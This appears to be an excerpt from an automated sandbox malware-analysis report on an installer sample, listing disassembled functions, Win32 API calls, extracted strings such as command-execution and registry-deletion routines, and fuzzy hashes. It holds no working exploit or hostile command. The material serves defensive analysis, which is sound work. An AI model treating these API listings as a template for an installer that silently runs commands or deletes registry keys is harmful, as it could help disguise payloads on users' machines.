                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                          Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                          • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                          • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                          Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(0000D000,00000064,0014F875), ref: 00403295
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                          • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                          Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                          • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                          • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                          Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                          • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                          Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00794950), ref: 00402387
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                          • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                          Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                          • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                          Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                          Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                          • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                          Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                          • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                          • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                          Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
